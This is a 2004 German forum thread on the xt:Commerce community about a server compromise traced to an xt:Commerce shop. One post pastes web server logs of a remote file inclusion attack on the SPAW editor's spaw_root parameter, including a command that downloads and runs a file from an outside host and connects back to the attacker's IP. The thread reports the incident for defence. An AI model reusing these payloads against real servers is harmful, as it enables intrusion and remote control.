Jump to content
xt:Commerce Community Forum

Serverhack ?ber Xtc M?glich.


celeron

Recommended Posts

Hallo,

heute Nacht wurde unser Server (1&1 ManagedServer) gehackt. Der Einstieg wurde lat Logdatei aus einem XTC Shop vorgenommen.

Bitte die XTC Admins mit mir in Verbindung zusetzen.

Hier scheint ein gro?es Sicherheitloch zu existieren.

Ich sende Euch dann die Logdatei zu.

Gru?

celeron

Link to comment
Share on other sites

Hallo,

kannst Du uns evt. kurz Beschreiben wie der Hacker vorgegangen ist. Au?er das er wahrscheinlich die Seiten ?ber dieses Forum gefunden hat.

Hat er mit einem Script schreibrechte in anderen Verzeichnissen bekommen !!

Sind die Einstellungen open_basedir und Safe Mode off mit diesem Problem auch in Verbindung zu setzen ?

Was macht deine Fixpackage dicht ?

Gru?

celeron

Link to comment
Share on other sites

Nat toll, kaum kommt man vom Lago di Garda Urlaub, schiesst einem die bl?sse ins Gesischt:

200.151.189.107 - - [12/Jun/2004:08:48:02 +0200] "GET admin/includes/classes/spaw/spaw_control.class.php?spaw_root=http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id HTTP/1.0" 400 428 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"

200.151.189.107 - - [12/Jun/2004:08:48:02 +0200] "GET admin/includes/classes/spaw/spaw_control.class.php?spaw_root=http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id HTTP/1.0" 400 428 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"

200.151.189.107 - - [12/Jun/2004:08:48:03 +0200] "GET admin/includes/classes/spaw/spaw_control.class.php?spaw_root=http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id HTTP/1.0" 400 428 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"

200.151.189.107 - - [12/Jun/2004:08:54:43 +0200] "GET admin/includes/classes/spaw/spaw_control.class.php?spaw_root=http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id HTTP/1.0" 400 428 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"

200.151.189.107 - - [12/Jun/2004:08:54:44 +0200] "GET admin/includes/classes/spaw/spaw_control.class.php?spaw_root=http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id HTTP/1.0" 400 428 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"

200.151.189.107 - - [12/Jun/2004:08:54:45 +0200] "GET admin/includes/classes/spaw/spaw_control.class.php?spaw_root=http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id'>http://www.kfhi.or.kr/agen-cmd?&cmd=id HTTP/1.0" 400 428 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"

200.151.189.107 - - [12/Jun/2004:08:59:17 +0200] "GET /admin/includes/classes/spaw/spaw_control.class.php?spaw_root=http://www.averdade.org/sh.ib?&cmd=id;uname%20-a HTTP/1.1" 200 3252 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

200.151.189.107 - - [12/Jun/2004:08:59:35 +0200] "GET /admin/includes/classes/spaw/spaw_control.class.php?spaw_root=http://www.averdade.org/sh.ib?&cmd=cd%20/tmp/;wget HTTP/1.1" 200 3123 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

200.151.189.107 - - [12/Jun/2004:09:00:41 +0200] "GET /admin/includes/classes/spaw/spaw_control.class.php?spaw_root=http://www.averdade.org/sh.ib?&cmd=cd%20/tmp/;wget%20www.kfhi.or.kr/dc.txt;chmod%20711%20dc.txt;./dc.txt%20200.151.189.107%20666 HTTP/1.1"

Eingabe in den URI ergibt:

Innocent Boys Crew Warning: main(): stream does not support seeking in /home/www/web/html/admin/includes/classes/spaw/spaw_control.class.php on line 16

Sieht so aus, als ob der Server dicht gemacht h?tte.

Link to comment
Share on other sites

register_globals=off w?r auch ne gute Idee f?r so manchen Server.

Ihr solltet bei eurem Hoster darauf bestehen, dass der das abschaltet. XTC arbeitet im Gegensatz zu so manch anderem Shop mit dieser einstellung, dann sollte die auch gemacht werden, zumal es der Sicherheit nur zugute kommen kann.

Link to comment
Share on other sites

@ all

Von: World4You Internet Services GmbH [mailto:[email protected]]

Gesendet: Freitag, 04. Juni 2004 08:00

Betreff: Ihr Webserver

Sehr geehrter Kunde!

Es gab leider heute Morgen Hackangriffe auf ihren Webserver.

Deshalb kommt es im Moment zu Unterbrechungen. Wir arbeiten mit Hochdruck daran, damit ihre Website wieder online ist und bitten um Ihr Verstaendnis.

-----------

hatte dem nicht allzuviel bedeutung zugemessen, zumal war ich um 11 wieder on, lass aber mal ne mail los, dass ich n?chere infos bekomme.

lg

peter

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
  • Create New...